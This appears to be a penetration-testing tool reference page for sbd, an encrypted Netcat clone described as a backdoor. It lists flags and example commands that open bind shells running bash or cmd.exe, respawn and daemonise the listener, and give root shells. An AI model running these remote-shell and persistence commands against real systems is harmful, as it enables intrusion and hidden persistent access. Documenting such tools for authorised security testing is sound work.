Post Exploitationbackdoornetcatencryptionshelltcpdaemon

sbd

sbd is a secure Netcat-clone that provides strong encryption for backdoor access on Linux and Windows systems. It supports program execution, source port selection, and continuous reconnection.

Description

sbd serves as a portable backdoor tool for Unix-like systems and Microsoft Win32, featuring AES-CBC-128 + HMAC-SHA1 encryption. It is designed for secure remote access with capabilities like executing programs upon connection and handling TCP/IP communication exclusively. Common use cases include establishing encrypted shells or command execution in penetration testing scenarios.

The tool allows listening for incoming connections or connecting outbound, with options for respawning connections and daemonizing. It supports invoking shells directly, particularly useful when setuid root for privileged access. Additional features include immobility timeouts and background operation, making it reliable for persistent access.

sbd is lightweight, with an installed size of 163 KB, and depends on libc6. It is licensed under the GNU General Public License.

How It Works

sbd operates over TCP/IP using AES-CBC-128 + HMAC-SHA1 for encryption when enabled. In listen mode (-l), it binds to a specified port (-p) and address (-a), executing a program like bash (-e) upon connection. Client mode connects to a host and port, establishing an encrypted tunnel for command execution or shell interaction. Features like -r enable reconnection attempts with delays, while -D daemonizes the process. Unix-specific options like -s invoke shells directly.

Installation

bash

sudo apt install sbd

Flags

-llisten for incoming connection

-p nchoose port to listen on, or source port to connect out from

-a addresschoose an address to listen on or connect out from

-e progprogram to execute after connect (e.g. -e cmd.exe or -e bash)

-r ninfinitely respawn/reconnect, pause for n seconds between connection attempts. -r0 can be used to re-listen after disconnect (just like a regular daemon)

-c on|offencryption on/off

-sinvoke a shell, nothing else. if sbd is setuid 0, it'll invoke a root shell

-w n"immobility timeout" in seconds for idle read/write operations and program execution (the -e option)

-D on|offfork and run in background (daemonize). default: -D off

-vdisplay verbose output

-nno name resolution

Examples

On the server, listen for a connection (-l) on port 4444 (-p 4444), execute bash on connection (-e bash) and display verbose output (-v) with no name resolution (-n). Outputs: listening on port 4444

sbd -l -p 4444 -e bash -v -n

On the client, connect to the remote server IP address (192.168.1.202) and port (4444). Allows executing commands like 'id' which returns uid=0(root) gid=0(root) groups=0(root)

sbd 192.168.1.202 4444

Display help output showing usage for connect and listen modes, along with all available options

sbd -h

Listen on port 4444, execute bash on connect, and infinitely respawn/reconnect with 5-second pauses between attempts

sbd -l -p 4444 -e bash -r 5

Listen on port 4444, invoke a shell (-s), and daemonize the process (-D on)

sbd -l -p 4444 -s -D on

Listen on port 4444 for Windows, execute cmd.exe on connect with encryption enabled (-c on)

sbd -l -p 4444 -e cmd.exe -c on

Connect to host 192.168.1.202 port 4444 using source port 12345

sbd 192.168.1.202 4444 -p 12345

Updated 2026-04-16kali.org ↗